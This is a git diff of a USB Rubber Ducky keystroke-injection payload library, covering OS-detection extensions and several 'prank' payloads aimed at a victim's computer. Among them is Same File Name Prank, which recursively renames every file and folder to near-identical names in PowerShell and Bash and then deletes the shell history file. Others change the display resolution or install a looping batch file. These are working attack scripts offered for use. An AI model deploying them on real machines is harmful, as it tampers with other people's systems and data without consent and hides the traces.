+                        IF ($_SCROLLLOCK_ON == TRUE) THEN
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING Scrolllock LED on
+                                ENTER
+                                STRING Prediciton: Android
+                            END_IF_DEFINED
+                            $_OS = ANDROID
+                        ELSE
+                            IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                                ENTER
+                                STRING No scrolllock reply
+                                ENTER
+                                STRING Prediction: Linux
+                            END_IF_DEFINED
+                            $_OS = LINUX
+                        END_IF
+                    END_IF
+                END_IF
+            ELSE IF ($_OS == MACOS) THEN
+                IF ($_CAPSLOCK_ON == TRUE) THEN
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING Caps LED on
+                        ENTER
+                        STRING Prediction: iOS
+                    END_IF_DEFINED
+                    $_OS = IOS
+                ELSE 
+                    IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                        ENTER
+                        STRING No caps reply
+                        ENTER
+                        STRING Prediction: MacOS
+                    END_IF_DEFINED
+                    $_OS = MACOS
+                END_IF
+            ELSE IF ($_OS == WINDOWS) THEN
+                IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+                    ENTER
+                    STRING Confident Windows Prediction
+                END_IF_DEFINED
+                $_OS = WINDOWS
+            END_IF
+        END_IF_DEFINED
+
+        RESTORE_HOST_KEYBOARD_LOCK_STATE
+
+        IF_DEFINED_TRUE #DEBUGGING_OUTPUT
+            ENTER
+            STRING OS_DETECT complete
+            ENTER
+        END_IF_DEFINED
+    END_FUNCTION
+END_EXTENSION
+
+EXTENSION HELLO_OS_UBER
+    REM VERSION 2.0
+    REM AUTHOR: Korben and UberGuidoZ
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
+            after DETECT_OS_UBER() prints the OS determination. Make sure
+            your custom conditional code is inserted below where commented.
+    END_REM
+
+    REM Defining custom $_OS enums if desired
+    DEFINE #EXTRA_EXAMPLES FALSE
+    DEFINE #SOME_OTHER_OS 6
+    DEFINE #ANOTHER_OS 7
+
+    FUNCTION HELLO_OS_UBER() 
+        IF ($_OS == WINDOWS) THEN
+            REM Windows code starts here
+            DELAY 1000
+            GUI r
+            DELAY 500
+            STRINGLN notepad
+            DELAY 1000
+            STRINGLN Legit DS3 on Windows
+            REM Windows code ends here
+        ELSE IF ($_OS == MACOS) THEN
+            REM macOS code starts here
+            DELAY 2000
+            GUI SPACE
+            DELAY 500
+            STRINGLN TextEdit
+            STRINGLN Legit DS3 on macOS
+            REM macOS code ends here
+        ELSE IF ($_OS == LINUX) THEN
+            REM Linux code starts here
+            DELAY 2000
+            CTRL ALT t
+            DELAY 100
+            STRINGLN nano
+            STRINGLN Legit DS3 on Linux
+            REM Linux code ends here
+        ELSE IF ($_OS == IOS) THEN
+            REM iOS code starts here
+            REM iOS code ends here
+        ELSE IF ($_OS == CHROMEOS) THEN
+            REM ChromeOS code starts here
+            REM ChromeOS code ends here
+        ELSE IF ($_OS == ANDROID) THEN
+            REM Android code starts here
+            REM Android code ends here
+        IF_DEFINED_TRUE #EXTRA_EXAMPLES
+            ELSE IF($_OS == #SOME_OTHER_OS) THEN
+                REM Custom Other OS code starts here
+                REM Custom Other OS code ends here
+            ELSE IF($_OS == #ANOTHER_OS) THEN
+                REM Another custom Other OS code starts here
+                REM Another custom Other OS code ends here
+        END_IF_DEFINED
+            ELSE
+                REM All else fails code starts here
+                REM All else fails code ends here
+        END_IF
+    END_FUNCTION
+END_EXTENSION
+
+REM Do the do! Change delay at beginning if desired.
+
+DETECT_OS_UBER()
+DELAY #EXECUTE_DELAY
+HELLO_OS_UBER()

payloads/library/prank/Hacker_Typer/payload.txt

@@ -3,10 +3,10 @@ REM Title: Hacker Typer
 REM Author:	UberGuidoZ
 REM Description: Opens a harmless website and types like a hacker
 REM Target:	Windows but easily modified to work on any OS with a browser
-REM Version:	1.0
+REM Version:	1.1
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
-REM
+ATTACKMODE HID STORAGE
 DELAY 1500
 GUI r
 DELAY 1000

payloads/library/prank/Resolution_Prank/README.md

@@ -0,0 +1,5 @@
+# Resolution Prank
+
+This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
+
+### Somewhat resource dependent, may not work on older computers

payloads/library/prank/Resolution_Prank/payload.txt

@@ -0,0 +1,103 @@
+REM TITLE Resolution Prank
+REM AUTHOR Mavisinator30001
+REM TARGET Any system running Windows 10/11
+REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+LED_G
+DELAY 500
+CTRL GUI d
+DELAY 500
+GUI i
+DELAY 2000
+STRINGLN display
+DELAY 2500
+TAB
+ENTER
+DELAY 200
+REPEAT 8 TAB
+ENTER
+VAR $CAPS_STATE = $_CAPSLOCK_ON
+WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
+HOLD DOWN
+DELAY 1000
+    RELEASE DOWN
+    ENTER
+    DELAY 200
+    LEFT
+    DELAY 200
+    ENTER
+
+    REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
+    VAR $LIGHT_UP_TIMES = 20
+    WHILE ($LIGHT_UP_TIMES > 0)
+        LED_G
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        LED_R
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
+    END_WHILE
+    WAIT_FOR_CAPS_CHANGE
+END_WHILE
+DELAY 300
+REPEAT 12 TAB
+ENTER
+DELAY 200
+HOLD UP
+DELAY 1000
+RELEASE UP
+ENTER
+DELAY 200
+LEFT
+ENTER
+DELAY 1000
+ALT F4
+DELAY 200
+CTRL GUI F4

payloads/library/prank/Rick_Rolling_Forever/payload.txt

@@ -5,9 +5,10 @@ REM
 REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
 REM Notes: Creates batch file, starts batch file, minimizes the window
 REM Target:	Windows but fairly easily modified to work on any OS with a browser
-REM Version:	1.3
+REM Version:	1.5
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
+ATTACKMODE HID STORAGE
 DELAY 2000
 GUI r
 DELAY 500
@@ -20,6 +21,7 @@ DELAY 1000
 STRING copy con rr.bat
 ENTER
 STRING @ECHO OFF
+ENTER
 STRING PING 127.0.0.1 -n 5 > NUL
 ENTER
 STRING :LOOP
@@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
 ENTER
 STRING GOTO LOOP
 ENTER
-CTRL C
+CTRL c
 DELAY 1000
 STRING cls && rr.bat
 ENTER

payloads/library/prank/Same_File_Name_Prank/README.md

@@ -0,0 +1,118 @@
+# Same File Name Prank
+
+This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
+
+Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
+
+![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
+
+> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
+
+![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
+
+> What it looks like instead if you turn on the extension view.
+
+# Index
+
+1. [Features](#features)
+2. [Payload Structure](#payload-structure)
+   - [Conditional Target OS Execution](#conditional-target-os-execution)
+   - [PowerShell (Windows)](#powershell-windows)
+   - [Bash (GNU/Linux)](#bash-gnulinux)
+3. [How to Use](#how-to-use)
+4. [Why not MacOS?](#why-not-macos)
+5. [Notes](#notes)
+6. [Credits](#credits)
+
+
+## Features
+- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
+- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
+- **Customizable**: Users can modify the base directory path and rename pattern as needed.
+
+## Payload Structure
+
+### Conditional Target OS Execution
+The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
+- If the target system is **Windows**, the script will execute a PowerShell script.
+- If the target system is **Linux**, it will execute a Bash script.
+
+### PowerShell (Windows)
+For **Windows** systems, the script:
+- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
+- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a  `, followed by their respective file extensions.
+
+### Bash (GNU/Linux)
+For **GNU/Linux** systems, the script:
+- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
+- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a  ` etc...).
+
+## How to Use
+
+1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
+   - `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
+
+   - `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
+   
+   - Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
+
+   - `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
+   
+      Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
+
+      Of course, you have to make sure that this folder exists....
+
+      ![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
+
+      > How Windows response to the command `cd ./Desktop/Hello/World/`
+
+      ![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
+
+      > How Ubuntu response to the command `cd ./Desktop/Hello/World/`
+
+      Consider the maximum length of file names on both Windows and GNU/Linux:
+         
+      - [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
+         
+         |=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
+
+      - [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
+         
+         |=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
+
+2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
+
+3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
+
+## Why not MacOS?
+
+I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
+
+If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
+
+## Notes
+- Ensure that the specified directories exist on the target machine.
+- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
+- Contributions to add support for macOS are welcome.
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/prank/Same_File_Name_Prank/payload.txt

@@ -0,0 +1,222 @@
+REM_BLOCK
+#############################################
+#                                           #
+# Title        : Same File Name Prank       #
+# Author       : Aleff                      #
+# Version      : 1.0                        #
+# Category     : Prank                      #
+# Target       : Windows 10/11; GNU/Linux   #
+#                                           #
+#############################################
+END_REM
+
+REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
+
+REM %%%%% DEFINE-SECTION %%%%%
+REM_BLOCK
+    
+    Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
+
+    Of course, you have to make sure that this folder exists....
+
+    Payload Settings:
+        #DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
+
+    Consider the maximum length of file names on both Windows and GNU/Linux:
+        - Limit on file name length in bash [closed]
+        |-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
+        - On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
+        |-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
+
+END_REM
+DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
+
+REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
+REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
+DEFINE #TARGET_WINDOWS TRUE
+DEFINE #TARGET_GNU_LINUX FALSE
+
+REM %%%%% PAYLOAD-SECTION %%%%%
+
+IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
+REM %%%%% WINDOWS CODE %%%%%
+
+    REM_BLOCK
+        Credits:    Hak5 LLC
+        Website:    https://hak5.org/
+        Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
+    END_REM
+
+    EXTENSION PASSIVE_WINDOWS_DETECT
+        REM VERSION 1.1
+        REM AUTHOR: Korben
+
+        REM_BLOCK DOCUMENTATION
+            Windows fully passive OS Detection and passive Detect Ready
+            Includes its own passive detect ready.
+            Does not require additional extensions.
+
+            USAGE:
+                Extension runs inline (here)
+                Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+                boot delay
+                $_OS will be set to WINDOWS or NOT_WINDOWS
+                See end of payload for usage within payload
+        END_REM
+
+        REM CONFIGURATION:
+        DEFINE #MAX_WAIT 150
+        DEFINE #CHECK_INTERVAL 20
+        DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+        DEFINE #NOT_WINDOWS 7
+
+        $_OS = #NOT_WINDOWS
+
+        VAR $MAX_TRIES = #MAX_WAIT
+        WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+            DELAY #CHECK_INTERVAL
+            $MAX_TRIES = ($MAX_TRIES - 1)
+        END_WHILE
+        IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+            $_OS = WINDOWS
+        END_IF
+
+        REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+            IF ($_OS == WINDOWS) THEN
+                STRING HELLO WINDOWS!
+            ELSE
+                STRING HELLO WORLD!
+            END_IF
+        END_REM
+    END_EXTENSION
+
+    GUI r
+    DELAY 1000
+    STRINGLN PowerShell
+    DELAY 1000
+
+    STRINGLN_POWERSHELL
+        cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
+
+        function Rename-Directories {
+            param (
+                [string]$path,
+                [ref]$counter
+            )
+
+            $folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
+            foreach ($folder in $folders) {
+                $newFolderName = "d" * $counter.Value  # Crea il nuovo nome della cartella
+                $newFolderPath = $newFolderName
+
+                $counter.Value++
+
+                Rename-Item -Path $folder.FullName -NewName $newFolderPath
+                Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
+            }
+        }
+
+        function Rename-Files {
+            param (
+                [string]$path,
+                [ref]$counter
+            )
+            $files = Get-ChildItem -Path $path -File -Recurse
+            foreach ($file in $files) {
+                $newFileName = "a" + " " * $counter.Value  # Crea il nuovo nome del file
+                $newFilePath = "$newFileName" + $file.Extension
+
+                $counter.Value++
+
+                Rename-Item -Path $file.FullName -NewName $newFilePath
+            }
+        }
+
+        $counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
+    END_STRINGLN
+
+ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
+REM %%%%% GNU/LINUX CODE %%%%%
+
+    REM_BLOCK
+        Credits:    Hak5 LLC
+        Website:    https://hak5.org/
+        Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
+    END_REM
+
+    EXTENSION DETECT_READY
+        REM VERSION 1.1
+        REM AUTHOR: Korben
+
+        REM_BLOCK DOCUMENTATION
+            USAGE:
+                Extension runs inline (here)
+                Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+                boot delay
+
+            TARGETS:
+                Any system that reflects CAPSLOCK will detect minimum required delay
+                Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+        END_REM
+
+        REM CONFIGURATION:
+        DEFINE #RESPONSE_DELAY 25
+        DEFINE #ITERATION_LIMIT 120
+
+        VAR $C = 0
+        WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+            CAPSLOCK
+            DELAY #RESPONSE_DELAY
+            $C = ($C + 1)
+        END_WHILE
+        CAPSLOCK
+    END_EXTENSION
+
+    CTRL-ALT t
+    DELAY 1000
+
+    STRINGLN_BASH
+        cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
+
+        rename_directories() {
+            local path=$1
+            local counter=$2
+            
+            directories=$(find "$path" -type d | sort -r)
+            
+            for dir in $directories; do
+                new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter"))  # Crea il nuovo nome della cartella
+                new_folder_path="$path/$new_folder_name"
+                
+                counter=$((counter + 1))
+                
+                mv "$dir" "$new_folder_path"
+            done
+        }
+
+        rename_files() {
+            local path=$1
+            local counter=$2
+            
+            files=$(find "$path" -type f)
+            
+            for file in $files; do
+                extension="${file##*.}"
+                
+                new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
+                
+                new_file_path="$(dirname "$file")/$new_file_name"
+                
+                if [[ "$extension" != "$file" ]]; then
+                    new_file_path="$new_file_path.$extension"
+                fi
+
+                counter=$((counter + 1))
+                
+                mv "$file" "$new_file_path"
+            done
+        }
+
+        counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
+    END_STRINGLN
+END_IF

payloads/library/prank/The_Matrix-Wake_Up/payload.txt

@@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
 REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
 REM Author: UberGuidoZ
 REM Target: Windows (including Powershell 2.0 or above)
-
+REM Version: v1.1
+ATTACKMODE HID STORAGE
 DELAY 3000
 GUI r
 DELAY 750